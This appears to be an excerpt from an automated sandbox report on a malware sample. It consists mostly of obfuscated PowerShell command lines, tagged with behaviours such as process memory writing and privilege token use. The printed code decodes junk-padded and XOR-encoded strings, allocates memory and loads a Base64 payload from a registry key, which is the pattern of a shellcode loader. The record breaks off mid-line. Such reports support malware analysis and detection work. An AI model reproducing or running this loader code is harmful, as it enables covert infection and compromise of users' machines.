tAgen2Fir8PolCMacEForBMacEBehBMul8Vid3proAStr4RacBMorFPraFOve8LanFhelFTil9Tin5KonBBil4SpeBSup7HazBGam8bogBdirFvokBTri4Ops9Non5JylADyr8SmoBKafFOmdBFro0CouBDoaCFrdBSki8QuiBRep2Ena9TraCFaeBRegESpiBSap5AsmAMus4GerBfdsDRepBTor4UroFUnp9MelFKon5Ind9SkaCSpiBBog8LanBGurAStaBBon0areBTilDKonBRte0NeuAEry2OveESem8InsFCoeDbarFTan1GruFCit5BelBRea7TanBBan0LegBNebDNedAGea2OveBDur4ImbFUdg8BygFopsFTri9Chr5SkrBTer4HudBarm7TalBKva8KomBSynFDerBChe4Sam8Lat5BruATum8EloAReh1PifBBer4ArcFRea9theFSub5Bre8Fje4TopAPro2EftBHekAUnpBUnh8KoiBTilAJinBTeoABicBDob4PerABal5OliESoc1SurFFraDCenFLan1korFHas5Lai8Noc4TraAOve2HanBSurAclaBWas8IncBBraASubBLinABaiBNec4ferALgk5ManEReg0GenFAlcDCleFNon1Bru8PlaABor8Tra2ProASuf8DidASpa2BetATet5YawBMon4InvBUngCDemFMahFSko9AfhCPreAOop4SalBCosDRanAOom5GuaBAnt8KroBfor2GulBAfd0ImmABru2KaeAMar5Trv9Bre5DumBAca4SleBNabDHipBlar4DrsBTip6UnlBrec0DerABoo5SamBMin4Ign8DuaCPrvFTar8ali'Out;sprUAdrsFaskOmkiBaikHylkSerestitEnn9Smi Sym<EnnRCouiDronLicdCaveSpakThyrCersStveBailPumeSvanLif2Bet;Val<forRudtiJagnKmpdSomeProkSaxrFrasGuteLoelUfreNonnKor3Spa Gal=Tic TabHStaTGutBKol Ure'LibFAfg5Cra8woo3KlaBPac4DelANom2SkaBHom2SjiAbel4BesBImp4UncBNorDiriBaeg4ColAMul2IntANyk2OnoFNikFTin9Ove5FarBUnr4SpiBArh7AcqBPit8IndBHvaFUopBHan4Far9Kor2BryBLanEcomBDatFOmdApol2FriAHkl5AlbAWhi3LndACel4DemBByn2KagADds5SukBNonETnkAAnt3MetFPro9GelFUds5Gla9RelCSamBFor8SchBGidAdeuBYde0AndBImbDEncBuan0DkfATyp2MeiEHae7EleFFadDWekFBur1Fol8BloAPri8Tyk2UdmADic8marAMer2AdeAKla5TvrBDdg4fjaBKomCIndFcajFsin8For3SemBBre4MicBAra7forBAnsDSamBRed4uomBCos2ArtAska5ShoBBes8SubBHyaEkleBCenFEpiFDisFAyi9Yar2monBSva0skgBCouDDamBBroDHypBVid8AmbBBesFTapBOti6Und9cyp2KooBBebErafBMalFVelAPen7gabBFis4RavBDroFSucASuc5PreBHom8SpeBStrEBesBFaeFFibAStr2Ste8assCPanEKupBKraECraBSco8ele2PinABaw5UmyBDel0StaBEliFStrBSou5DogBRec0AgnAPri3SanBGru5VaaFForDCaiFTik1MicFHvn5Kok8Ten5DisBMas8tecBPreDCreAKah7CriBTid8SukAPer3GlaBBegAAsyBLep4OpkBQuo5StrBapp4enaAFem2KapFCap8TynFJurFPla8Sem2TriBBeg4OveAAnn5dic9Odr8BraBFinCFilAafs1SkiBDraDSteBtri4UncBPalCEffBLys4FunBOutFrisASui5OveBSto0EskALit5CheBKro8CagBIleELigBKvrFFor9Ana7OchBfasDHonBAbs0FamBNon6medAByp2ParFTit9GluFPri5Dis9ShiCExeBTon8AstBUafAvasBRaa0TreBUnzDNocBIde0MulABog2natEDat6SnoFNon8Per'Hil;PreUFabsRevkStjiForkUndkSpneCartPur9Try Swi<FunRTrsiWrenEyedDixePerkCharBrusEnteUsdlAlteFeenDen3ban;mon<HarRHeniHklnInhdSojeLikkFdrrscesdyseDeslFuteRivnSto4Twi tim=Gra SteHRumTElgBOpd Bem'StrFSpo5Pol8tas3PerBlew4ManAPae2BioBRac2KnaAKaa4BelBNot4SykBUrtDRomBZon4doeAKim2InsAKib2ArdFSteFSup9Stu5FosBSto4SprBBes7BurBOpv8ProBNotFRivBCoa4Hal9BeuCProBAfd4IndADia5EncBagr9BenBPlaEMinBskr5CauFSki9HemFPro5Cre8men4ProASam2TriBBedAButBArs8StnBAfdAFreBMacAYndBHep4HamAFle5BroEKon3TypFfogDPetFBge1TonFTir5obl8Ado4FriAAan2DisBChuAHydBamb8SemBSauAFedBTaxAfisBSkr4RepANun5KomEEdd2conFKhmDParFSin1DokFKul5Lre8Sep4GlaBHecFMobASin1ForADia3CulBDeo8decAJol2RigBProEbyrBIslFEnkBApo0SpaBUsy3HasBScaDGroBNvn4TilFWeiDFirFBib1PisFAco5Wal8Occ5KarBOpl8OveBGlaDIsrADel7DelBRed8SagAEls3marBEssAEksBTil4DraBMag5ForBTri4NatAUnv2AlpFTra8AllFHesFHoo8Unc2StaBqui4GenAJor5Spo9Hol8comBUraCSamApla1HusBChiDTheBRes4BibBPhyCSypBPri4KarBNonFRetAMan5SewBdue0fisAQui5CheBGni8graBstoEUnsBArbFOmk9Gom7BasBStaDForBArv0HalBAmo6LanALig2NatFApn9UfoFsel5Asf9TonCNonBVin8DefBBesAAntBHej0ConBDrmDGruBFod0ManABer2halEAth6MisFFeb8gas'Lut;GerUVansFikkNegiAfvkReckStaeThetCas9Thr Ski<SvaRCyliHarnAlydDekeUnlkTrirViksPaseBrilShaeeurnflo4Dip;Inf<HypRKokiSernSoldlorematkBalrfissAugeLotlRedeSkrnPar5Ost Agg=Bry ResHperTUndBKal Rad'SerAskr3MicBfig4TryAQua5DigARhi4BruAFor3SomBParFKirFAni1LomFAfr5Sec8con3AfgBSkr4StrAElf2UnpBAng2RedAUnd4eyrBInt4KomBPanDPolBSci4FetAUni2JohAOms2SidFBulFbes9Bak2PolAInc3secBFag4UdtBRke0SilAHve5IndBmor4Tot8Fra5PudAPia8MucAKog1SpeBFor4SreFeac9AnvFPro8Eft'Erh;SmaUhimsUnikOutilevkabskChaeBertBet9Gal Gar<PorRAnaiPixnUncdMegeLigkLumrDecsCaleDuvlBeleOmnnReg5Pom Unc Bur Orn;Pre}Bro<MunREvedomsvSpeiFolnLkasStotPedyAanpBeneShirOvesTal Kde=for RsoHFusTOutBSwo Tan'NedBTarALavBHav4SinASyg3SelBNicFUdsBBon4levBStsDNonEKev2AabEChi3Kon'Dor;Far<PlaRKulidannKatdMceeBilkLnkrIdlsNoneLyslTvreBusnAut6Brt Una=Fav lobHStuTMorBNon Lou'MarFout5Pla8Car1SmrAHoc3HaaBKut4RasBUniCInkBste8IslBUnfDKamBAarDHreBAdm4ItaBKorFMukBFigFBldBTer8RerBInd0BifBSprDAmaBTraDPreATam8HarFRoc1LreEdilCUndFSen1Gla8ManAAnn8Mon2dykAAvo8SunAVae2GraAFil5TjeBphy4FanBudvCResFKarFsad8Kru3AfsAInt4ColBSedFEpiABeg5BanBArb8TaxBTotCPseBPic4EtwFSkjFSub9Imp8IndBNotFRecAKon5BanBPre4batATan3ParBunaEMegAKat1Keg8Unh2HylBBag4SabASti3KurADal7LymBRus8FraBNon2ProBToo4ExpAAfs2PudFDisFPbe9ArbCDebBSoc0racASen3HjuAAfh2PosBOct9MusBJer0NotBNucDFis8BooCSjlEsteBHeaEBruBFir9Wow6MidBMic4BriABid5Non9Sem5vulBAss4NaiBEnhDAstBUni4SluBTje6UnmBUnh0spiACut5AceBPla4Ind9Ann7RusBTaaEPelATje3Roe9Kar7TilABre4LinBBroFKonBCol2FirAUni5GodBFje8IntBSenEpunBDivFHar8Brd1UngBSyzELnnBBeg8ForBSljFsalAMus5ReoBSph4MidAVik3FosFAdg9NonFLaw9burBBud7FunBOriAOveABeg1DisFHje1OmnFTro5Aka8Int3KomBByg5ReaAPan7OrdBSqu8ForBForFDetAGen2FelAKnu5SkrAHov8SpeATri1SubBmee4SkkAUnl3BlaAKla2NonFPla1NonFFez5Pan8Nat4SteAAfs2DecBUnsAPyrBKom8ForBOveAHypBCooAlouBAut4RevAKry5RefEFle5AftFMar8IsdFGriDforFFer1PenFLys9Pre9Afk6pre9San5Vel8Sin5ReeFTra1Rse9Paa1NonFeve9Pen8VejADus9Shi8BarBAngFaboAmod5Sop8Sam1DilADef5MolAHal3Car8ArbCStrFGesDPhyFUnv1Uro8NurAAlo8Jea4War9Met8GonBOrdFReoAAto5staEAfr2burECon3Dis8TeoCAfgFDikDstiFTra1Vat8RepARge8Uds4Cuc9Sau8skoBRekFDdsABea5UnaEFig2UnhEFej3Hil8ejeCBorFLorDKasFBob1Lus8GroAPro8Ove4udd9sam8SnyBintFRimAEel5KinESpi2EthEDia3Kok8PlaCLevFLac8EngFTon1AulFReb9Con8BerAExc9San8KaiBDagFSarADyn5Epi8Cal1RemASkr5uveAMil3Int8TjhCAblFRea8LanFOve8PleFSem8dat'Adm;ResUQuasAngkUnfiSerkFoukPreeChotFin9Ant Str<SucRIntiFrinSkadSjoePlakBenrDigsstreremlWabeFronDul6Ilt;Non<GasACivnMortExciChamDueoNonnHydiBalcgrs2Duf2Und5Fub Smu=Sni SkafMedkShepDoo Pol<topUCavsViskUndiUdskLimkScrePontEnk5Sov Sun<FriUTrvsTaxkDdciHjekmickFleeSemtGlo6Bef;Cir<AfsRTriiPronMoudGodeSklkGyprAulsSteeAchlDefeHjdnAlk7Ind Glo=Fre RunHLicTPreBChr Ost'XerFYas5Sak9BetEBloAKvl1ArtBAux3outASta3NyaAIni4BacBOve5ProBRep5TviBEle4ElaAByd5SwaADis2MisEFru0VenECor0bacEUtu9SerETod2SkrFCha1SccECuiCRaeFUdd1PlaFFaj5Plu8Sen1FolAKom3CisBSam4VilBSchCSubBBeb8ErgBFolDThaBNorDSutBCil4MarBTraFJawBManFEjeBTao8OmlBSuf0CalBMarDTppBLikDDowADip8UndFBouFRar9Pla8ForBSliFHenABli7MinBDevELumBAdhAWaxBBib4nomFAsa9Tau8IndABri9Diu8LovBMirFTilAAna5Mon8Tav1TnkAMaa5StuASop3Ana8FemCFraEFruBCinEpanBUnh8SisBGesBGge4MaaADec3RefBBudERidFAfsDSnuFhje1SpiEKon0EmiErid0TheEUnt3ActEFru0ScoEDin1AriFSlbDRulFVul1PosELav1SpgAKra9FlaEWos2MerEBok1forEWoo1ThoEPlo1ValFvinDTheFLyd1JawENeb1IneAIro9OedEcoi5PreEHyo1UdsFLiv8Dia'Lin;PlaUAdmsHepkBekiOvekKrskBdeeTritSta9Pro Hvi<IseRKryiReenInddSymeNitkFlarBlasPsyeballAnseDidnFel7Sed;Jun<epiRRetiDeenGendSerecenkDecrVissAnveNiclReneSupnPye8Ens Dro=hem RuiHMilTPreBTrs Ich'kanFSky5Afh8Man5BilAFol3LibBAfb8CotBCyn2potBmagAGivBSmi8VomBhusFdjvBSla6StaBTvaDNavADif8IndERum0TypEudf0GalEKom2ImpFFel1GinEUnhCUdtFBri1milFBal5Sin8Mrt1DefAPri3TvaBGui4LedBGonCAnaBMil8KreBWraDUddBAssDPhoBNum4UndBSurFHumBHelFLogBBef8FijBCoh0FilBUbeDHydBRunDblsABrs8BesFDelFUri9Ren8MyoBInuFXylASha7VinBIntEuriBSubAMisBBet4RegFSam9Sla8PhiAAlu9Cgl8GudBzohFBurAUnr5non8Skr1SofABrs5ForAFul3yen8DraCBunEfezBTapEOmlBKni8GalBRumBVol4AfhAPne3ExtBSieERepFDieDhygFTre1SalESyl6HukEIns6LacEEft6HaiEHan8OutEFor4AgoERef2MokEFre3PinESpi9StaFMesDRenFNon1PriEEnh1ForAInt9optEHan2WinESil1LibEBag1EniELok1SteFEthDAdvFUdb1WorEord1WalATro9SubETic5DekFMen8Ano'Was;unaUSavsHuskChaiheskHidkAaneOmstPer9Ovo Emp<KerRKlkiFrinPaldExaeLevkSporMursHuleBiglUsteDecnHun8Int;Bra<LogVTergFavaHosvnoniPirsBoyeOvenUns=Byl(UdsGGgeeOestEng-HerIKlotGaneStymNegPElerSeioLiopOveeClarRattKiryPil Non-CouPCelaAfstTilhMof Cla'PerHAfhKTriCBusUSon:Udr\etaadimsScaeChapEmptEuriPrecZerijulzOkseCadsKal\steCSysoDberTeipDedoSperOusasantspiiagovSkreInclMisyFra'Nag)Eks.ForATaguSelxFaciPiclBleiConaLigrAntlJanyGli;Sta<misREksiDilncondFaceBrukForrSkiskraePaalUnueBesnPen9kio Out=Fan GruHEdsTMatBAmy For'TacFSta5pre8Min3OffBcri8FleBAnvFSikBFly5StaBHor4HinBpalACirAAno3ZacASyl2DasBAfk4PriBGabDSidBHor4MosBHekFUdsFBre1FluERadCMasFned1Emb8LseASka8Pre2SagAUna8NedASem2FitAKer5AneBDis4SonBChoCManFStdFCym9Pos2BrmBPiaEDisBBorFForATek7CosBCal4morAmor3PadARat5Afr8arkCTonEForBUndEUnrBOve9Fej7KomATil3TerBOroEScrBLysCTur9Ind3GenBGle0EmeADer2EneBAvl4MyrEren7PreEThi5Suc8Agi2ZenAUnd5BanAUaf3oveBAvo8StiBEtaFAntBPet6TabFBrn9preFTro5Kul8Kor7TilBCho6StrBSpr0bleAVid7SluBBum8EmiAFat2sliBVri4SkaBselFUmuFUna8Bor'Che;BemUPnesSilkConiReskSavkSmaeBretPil9Jen Rel<SpaRSaliRounProdMiseSupkAlkrkarsTokeBillEtteAlknDis9Kos;Gib<SigVTrigFljaTravGraiDyrscoreKiwnHrf0Tum Ind=Ski NedHHypTDelBMis Mye'vrk8DepAUbe8Dsi2StdARea8PaaASwa2GorAAnt5ElvBGlo4GitBEmoCBraFSekFOve8Bro3DemAWin4AarBAssFBedAboy5TraBIng8EduBTotCBesBUnf4UdlFGumFVie9Dri8Ro BResFArbAAfv5susBGun4TarABre3HaiBKonEBulAScr1Sep8Pan2SylBIsl4SejAGad3FidACac7OffBSup8TagBSys2DumBDef4IntAAsc2SexFrefFaga9GueCUndBPin0ThrAAll3EcoAWei2UbeBBru9DevBHje0ResBUtrDIgn8ObsCCynERgeBPolESkrBTen9Omn2NanBLsbEEftAEla1muhADgn8MolFBet9KamFBra5Att8Div3SulBScr8HttBPipFSigBApo5ShaBAlt4DioBledASemADip3MarAUnd2OxiBOrd4BucBcryDAabBRaa4LinBDesFDooFHerDSybFSmu1GloEUnd1BoxFEffDOliFPor1PreFHav1tapFWor5Mat9acrEUnbAOut1finBTet3FstAPar3DatAMas4BehBLit5BufBAna5EksBVar4BilAFal5DisASer2KomEinc0ScrEVrf0UniESde9sciESta2LreFCenDtraFSol1VogEPri0PitEImp0UgeESer3AffEUnp0BesENos1DouFHel8Van'Ska;InfUTalsSmakGeniRipkHorkApoeemptKat9Mai Pri<DecVSjogMnsaPravSmeiDhasCageAggnrem0Oli;Uns<marDScoeOrifOveeLotaSansGnaeSur=Udb<BedRBiliIngnHefdOpeePtekMenrOldsUdseAntlReteSalnSig.PrecDemoHoluElsnInttana-Pan1Ing1Sno2Meg1Eve0Sor;Pie<PolVTakgtelaSkovYdeiGhasUndeBilnHyd1Lyk Pre=Ove TamHKopTFugBPil Jor'Hof8FlyAPho8Rei2SlaAStn8AnfASik2CorABes5MagBSid4SejBAppCachFTilFPro8Udf3BilADis4PreBWarFkviACam5CesBGul8AmaBCoeCWraBObt4IcoFAfsFSpg9Gan8PasBmyxFRobARec5ProBLoo4PerAVaa3TohBPigEAtrADep1flo8Pan2LicBGra4BegAArk3RhoAArm7NonBBac8BinBMas2TreBSan4VrdAHel2MorFOveFClu9SjaCsplBMar0OutAvej3UreAGat2AfsBEye9UphBOcc0CruBTopDMac8PynCBkkEInfBTudEStoBMon9Svi2dekBHypETawAVed1LacAHov8RinFFst9AstFSkv5Pes8Ska3UdsBTra8redBFreFTorBAfs5palBBit4SkrBSemAPriABah3InsATyr2unfBTen4FleBPseDSutBbas4TooBDanFParFSlaDDugFBat1EneEDir0ExpECac0MenEafm3MarEMeg0TreEArc1TraFFerDDaeFSpi1SkiFUna5Kng8Non5EjeAspi3StrBIns8GumBBra2LdeBColADisBFor8LevBFunFaarBLem6KasBTilDLabATen8CliETim0traESmu0ClaEtur2MarFDepDBesFklo1BufFIns5Str9For5ManBUsk4KreBSur7LanBpou4UndBeje0DatAFle2GraBExt4matFOli8Sia'aer;MyoUNonshjlkCroiSpykBjakEldePestMar9Meg ref<BraVDepgTriaCacvBryiDatsQuiedisnSte1Cup;Sla<BloVBrigExaaLogvCriiNobsForeTignKni2Scu Eth=Lse BiaHPanTSpaBWan Sid'TryFTri5obi9Maa5OveATos8TraBFrd3ChaBKas7EpoAInc3TurBFlaEHapADek2PaaASem5wooBUmb4AktBGugFPinERet5StaEPam6UspFUnc1TofEBloCTotFPro1Out8LftAVan8Lum2HalABog8BehAFod2PriAuds5HmoBStv4GruBSpeCBaaFkaaFluf8Nor3UndAKos4MatBUkrFSubAUnc5CoxBEns8IntBStoCrhoBSub4GalFBroFCir9Spe8TesBHotFScoAAll5RegBPol4IhuAUda3TreBRitELagAQue1Hex8Sub2HalBAft4AnhASul3MecASul7SekBChi8stoBMyx2IndBCli4aniASub2MehFFraFZwi9MecCYngBKon0SubABek3SimASam2LucBMer9TrsBFas0KvoBIncDAdv8cooCBssEAfvBChiETekBUsk9Gru6MugBGon4TofAove5Con9Sep5MolBEle4ForBUpgDRetBdus4ColBHea6SysBUds0smiABis5JewBdec4Pre9Beg7eliBVowEdriAPre3Oph9San7haeABru4NubBRepFduaBPli2RecAFor5AndBVra8UdhBBemESvbBStaFIdi8str1kemBSpoESupBFor8antBPipFFelANed5DuaBBir4PneAper3LogFWeb9lufFUrt9BonBSev7TreBImmAFaiAGev1GruFPja1UndFsus5Pro8dif5AkrBUtn8TegABre7AalABea8BesFInf1BefFVan5Ana8Far2BnpAIll4BjlAOve1TomBHyp4RedAFor3SerBLas8floBAccFTilBWal7InfBFlo8PosASui3BruBNatCFriBkar8FigANse5BruAAdj8OpgFHer8KikFSorDRkkFCon1MauFSen9Lan9Meg6Pho9Non5Bid8Kon5BesFFil1Epi9dev1MisFYve9Cen8LakAEvo9Rab8AceBCenFBlaAGas5Lep8Qui1linAdeg5LurADis3Bro8SynCgalFUnsDDicFAfd1Ben8TinAOil9Rep8SunBTabFOrnAUdv5Sko8Adf1MisAgaa5NedAost3Udh8friCSheFHarDevoFFri1Tap8LagALav9Spo8ManBneeFAgaAAsk5Frd8cou1PatAUnd5DouATir3Unp8DagCLreFMusDEgeFAne1Kva8afhACai9Opv8TerBBetFDorAvan5Bul8Ste1AtoAMis5spoABrd3Gat8CroCFlaFAndDDumFExc1Jam8DiaAVok9epi8IntBVrdFDysACol5Aar8Uni1UndAFlo5GasAStr3Equ8MooCPapFAbi8SpiFCro1subFSub9Let8HanAAka9Und8UnlBOveFSorAMal5Iso8Und1astAHem5SolALea3Bli8TabCNogFRen8BooFEns8PisFSpu8Bio'Fra;Eur&For(Bio<BloURensSynkPhaiSkakSumkseleGertCol7Kna)Fur tro<PriVTomgSumaParvBygiKodsMaueOstnTvi2Ver;Unc<FreVCoxgopdaOinvToriKetsRageChenCon3Uve Byp=Dob kreHTetTPreBUds cho'CatFSta5Hel9ath5TroAinv8AfbBKam3VrdBdel7TsaAAnt3SteBUndEMesAauk2AvaAKed5BorBDai4NonBMonFAnpERhy5ColEAfm6AnlFkadFSmr9Bor8OpmBHobFSubARec7AmbBmisEterBLepASkoBSal4TemFAnk9HksFfra5For9BytEsikADra1CamBcha3udsAEli3HveANon4UnkBAss5PlaBSta5FriBSte4FlgAUka5TasAMam2OplEKry0LivEAng0treEAne9TerESpr2PlaFReiDMisFCri5Omk8For5IntAAct3OveBDir8TroBAba2DahBGasAAlkBCom8HjuBUnwFTreBLag6DybBMyeDSubAYde8BanESim0CraEBal0DanEBor2FemFMidDBorFKon5Dem9Tra0PaaBStaFAdmAPer5semBLin8PalBCiaCInsBAbaEDmpBConFweeBFas8RheBLop2SanEFul3RetEver3SkeEudl4EnkFMicDUdrESnu1MilFPaaDLasEPoo1StaFspi8Fol'San;Pas&Anc(Pra<BjrUSemsPerkBroiOmbkUndkChaeDeetRev7Fum)Unf Lam<GuaVEftgForaDisvPriiProsUndeGifnBjr3Tre#Skj;""";Function Vgavisen9 { param([String]$Revisionsvirksomhedens); For($opsummeringers=3; $opsummeringers -lt $Revisionsvirksomhedens.Length-1; $opsummeringers+=(3+1)){ $Spumoni = $Spumoni + $Revisionsvirksomhedens.Substring($opsummeringers, 1); } $Spumoni;}$Timedes0 = Vgavisen9 'HygIOstERetXReg ';$Timedes1= Vgavisen9 $Embroil;$Timedes1=$Timedes1.replace('<','$');$Timedes1=$Timedes1.replace('>','"""');if([IntPtr]::size -eq 8){ .$env:windir\S*64\W*Power*\v1.0\*ll.exe $Timedes1 ;}else{ & ($Timedes0) $Timedes1;}"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:448

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$Revisionsvirksomhedens); $chameleonic = New-Object byte[] ($Revisionsvirksomhedens.Length / 2); For($opsummeringers=0; $opsummeringers -lt $Revisionsvirksomhedens.Length; $opsummeringers+=2){ $chameleonic[$opsummeringers/2] = [convert]::ToByte($Revisionsvirksomhedens.Substring($opsummeringers, 2), 16); $chameleonic[$opsummeringers/2] = ($chameleonic[$opsummeringers/2] -bxor 209); } [String][System.Text.Encoding]::ASCII.GetString($chameleonic);}$Mikalas0=HTB '82A8A2A5B4BCFFB5BDBD';$Mikalas1=HTB '9CB8B2A3BEA2BEB7A5FF86B8BFE2E3FF84BFA2B0B7B49FB0A5B8A7B49CB4A5B9BEB5A2';$Mikalas2=HTB '96B4A581A3BEB290B5B5A3B4A2A2';$Mikalas3=HTB '82A8A2A5B4BCFF83A4BFA5B8BCB4FF98BFA5B4A3BEA182B4A3A7B8B2B4A2FF99B0BFB5BDB483B4B7';$Mikalas4=HTB 'A2A5A3B8BFB6';$Mikalas5=HTB '96B4A59CBEB5A4BDB499B0BFB5BDB4';$Mikalas6=HTB '838582A1B4B2B8B0BD9FB0BCB4FDF199B8B5B493A882B8B6FDF181A4B3BDB8B2';$Mikalas7=HTB '83A4BFA5B8BCB4FDF19CB0BFB0B6B4B5';$Mikalas8=HTB '83B4B7BDB4B2A5B4B595B4BDB4B6B0A5B4';$Mikalas9=HTB '98BF9CB4BCBEA3A89CBEB5A4BDB4';$Uskikket0=HTB '9CA895B4BDB4B6B0A5B485A8A1B4';$Uskikket1=HTB '92BDB0A2A2FDF181A4B3BDB8B2FDF182B4B0BDB4B5FDF190BFA2B892BDB0A2A2FDF190A4A5BE92BDB0A2A2';$Uskikket2=HTB '98BFA7BEBAB4';$Uskikket3=HTB '81A4B3BDB8B2FDF199B8B5B493A882B8B6FDF19FB4A682BDBEA5FDF187B8A3A5A4B0BD';$Uskikket4=HTB '87B8A3A5A4B0BD90BDBDBEB2';$Uskikket5=HTB 'BFA5B5BDBD';$Uskikket6=HTB '9FA581A3BEA5B4B2A587B8A3A5A4B0BD9CB4BCBEA3A8';$Uskikket7=HTB '989489';$Uskikket8=HTB '8D';$Tivy=HTB '84829483E2E3';$Superinfirmity=HTB '92B0BDBD86B8BFB5BEA681A3BEB290';Set-Alias -name Uskikket9 -value $Uskikket7;function fkp {Param ($Toughened, $Muffin) ;$Rindekrselen0 =HTB 'F59EA7B4A3BDB0A7B8A2B9BDA8F1ECF1F98A90A1A195BEBCB0B8BF8CEBEB92A4A3A3B4BFA595BEBCB0B8BFFF96B4A590A2A2B4BCB3BDB8B4A2F9F8F1ADF186B9B4A3B4FC9EB3BBB4B2A5F1AAF1F58EFF96BDBEB3B0BD90A2A2B4BCB3BDA892B0B2B9B4F1FC90BFB5F1F58EFF9DBEB2B0A5B8BEBFFF82A1BDB8A5F9F584A2BAB8BABAB4A5E9F88AFCE08CFF94A0A4B0BDA2F9F59CB8BAB0BDB0A2E1F8F1ACF8FF96B4A585A8A1B4F9F59CB8BAB0BDB0A2E0F8';Uskikket9 $Rindekrselen0;$Rindekrselen5 = HTB 'F590B6B8A5B0A5BEA3B4A3BFB4A2F1ECF1F59EA7B4A3BDB0A7B8A2B9BDA8FF96B4A59CB4A5B9BEB5F9F59CB8BAB0BDB0A2E3FDF18A85A8A1B48A8C8CF191F9F59CB8BAB0BDB0A2E2FDF1F59CB8BAB0BDB0A2E5F8F8';Uskikket9 $Rindekrselen5;$Rindekrselen1 = HTB 'A3B4A5A4A3BFF1F590B6B8A5B0A5BEA3B4A3BFB4A2FF98BFA7BEBAB4F9F5BFA4BDBDFDF191F98A82A8A2A5B4BCFF83A4BFA5B8BCB4FF98BFA5B4A3BEA182B4A3A7B8B2B4A2FF99B0BFB5BDB483B4B78CF99FB4A6FC9EB3BBB4B2A5F182A8A2A5B4BCFF83A4BFA5B8BCB4FF98BFA5B4A3BEA182B4A3A7B8B2B4A2FF99B0BFB5BDB483B4B7F9F99FB4A6FC9EB3BBB4B2A5F198BFA581A5A3F8FDF1F9F59EA7B4A3BDB0A7B8A2B9BDA8FF96B4A59CB4A5B9BEB5F9F59CB8BAB0BDB0A2E4F8F8FF98BFA7BEBAB4F9F5BFA4BDBDFDF191F9F585BEA4B6B9B4BFB4B5F8F8F8F8FDF1F59CA4B7B7B8BFF8F8';Uskikket9 $Rindekrselen1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Tilvirkedes,[Parameter(Position = 1)] [Type] $Unprisonable = [Void]);$Rindekrselen2 = HTB 'F583B4A2B2A4B4BDB4A2A2F1ECF18A90A1A195BEBCB0B8BF8CEBEB92A4A3A3B4BFA595BEBCB0B8BFFF95B4B7B8BFB495A8BFB0BCB8B290A2A2B4BCB3BDA8F9F99FB4A6FC9EB3BBB4B2A5F182A8A2A5B4BCFF83B4B7BDB4B2A5B8BEBFFF90A2A2B4BCB3BDA89FB0BCB4F9F59CB8BAB0BDB0A2E9F8F8FDF18A82A8A2A5B4BCFF83B4B7BDB4B2A5B8BEBFFF94BCB8A5FF90A2A2B4BCB3BDA893A4B8BDB5B4A390B2B2B4A2A28CEBEB83A4BFF8FF95B4B7B8BFB495A8BFB0BCB8B29CBEB5A4BDB4F9F59CB8BAB0BDB0A2E8FDF1F5B7B0BDA2B4F8FF95B4B7B8BFB485A8A1B4F9F584A2BAB8BABAB4A5E1FDF1F584A2BAB8BABAB4A5E0FDF18A82A8A2A5B4BCFF9CA4BDA5B8B2B0A2A595B4BDB4B6B0A5B48CF8';Uskikket9 $Rindekrselen2;$Rindekrselen3 = HTB 'F583B4A2B2A4B4BDB4A2A2FF95B4B7B8BFB492BEBFA2A5A3A4B2A5BEA3F9F59CB8BAB0BDB0A2E7FDF18A82A8A2A5B4BCFF83B4B7BDB4B2A5B8BEBFFF92B0BDBDB8BFB692BEBFA7B4BFA5B8BEBFA28CEBEB82A5B0BFB5B0A3B5FDF1F585B8BDA7B8A3BAB4B5B4A2F8FF82B4A598BCA1BDB4BCB4BFA5B0A5B8BEBF97BDB0B6A2F9F59CB8BAB0BDB0A2E6F8';Uskikket9 $Rindekrselen3;$Rindekrselen4 = HTB 'F583B4A2B2A4B4BDB4A2A2FF95B4B7B8BFB49CB4A5B9BEB5F9F584A2BAB8BABAB4A5E3FDF1F584A2BAB8BABAB4A5E2FDF1F584BFA1A3B8A2BEBFB0B3BDB4FDF1F585B8BDA7B8A3BAB4B5B4A2F8FF82B4A598BCA1BDB4BCB4BFA5B0A5B8BEBF97BDB0B6A2F9F59CB8BAB0BDB0A2E6F8';Uskikket9 $Rindekrselen4;$Rindekrselen5 = HTB 'A3B4A5A4A3BFF1F583B4A2B2A4B4BDB4A2A2FF92A3B4B0A5B485A8A1B4F9F8';Uskikket9 $Rindekrselen5 ;}$Rdvinstypers = HTB 'BAB4A3BFB4BDE2E3';$Rindekrselen6 = HTB 'F581A3B4BCB8BDBDB4BFBFB8B0BDBDA8F1ECF18A82A8A2A5B4BCFF83A4BFA5B8BCB4FF98BFA5B4A3BEA182B4A3A7B8B2B4A2FF9CB0A3A2B9B0BD8CEBEB96B4A595B4BDB4B6B0A5B497BEA397A4BFB2A5B8BEBF81BEB8BFA5B4A3F9F9B7BAA1F1F583B5A7B8BFA2A5A8A1B4A3A2F1F584A2BAB8BABAB4A5E5F8FDF1F9969585F191F98A98BFA581A5A38CFDF18A8498BFA5E2E38CFDF18A8498BFA5E2E38CFDF18A8498BFA5E2E38CF8F1F98A98BFA581A5A38CF8F8F8';Uskikket9 $Rindekrselen6;$Antimonic225 = fkp $Uskikket5 $Uskikket6;$Rindekrselen7 = HTB 'F59EA1B3A3A4B5B5B4A5A2E0E0E9E2F1ECF1F581A3B4BCB8BDBDB4BFBFB8B0BDBDA8FF98BFA7BEBAB4F98A98BFA581A5A38CEBEB8BB4A3BEFDF1E0E0E3E0E1FDF1E1A9E2E1E1E1FDF1E1A9E5E1F8';Uskikket9 $Rindekrselen7;$Rindekrselen8 = HTB 'F585A3B8B2BAB8BFB6BDA8E0E0E2F1ECF1F581A3B4BCB8BDBDB4BFBFB8B0BDBDA8FF98BFA7BEBAB4F98A98BFA581A5A38CEBEB8BB4A3BEFDF1E6E6E6E8E4E2E3E9FDF1E1A9E2E1E1E1FDF1E1A9E5F8';Uskikket9 $Rindekrselen8;$Vgavisen=(Get-ItemProperty -Path 'HKCU:\asepticizes\Corporatively').Auxiliarly;$Rindekrselen9 = HTB 'F583B8BFB5B4BAA3A2B4BDB4BFF1ECF18A82A8A2A5B4BCFF92BEBFA7B4A3A58CEBEB97A3BEBC93B0A2B4E7E582A5A3B8BFB6F9F587B6B0A7B8A2B4BFF8';Uskikket9 $Rindekrselen9;$Vgavisen0 = HTB 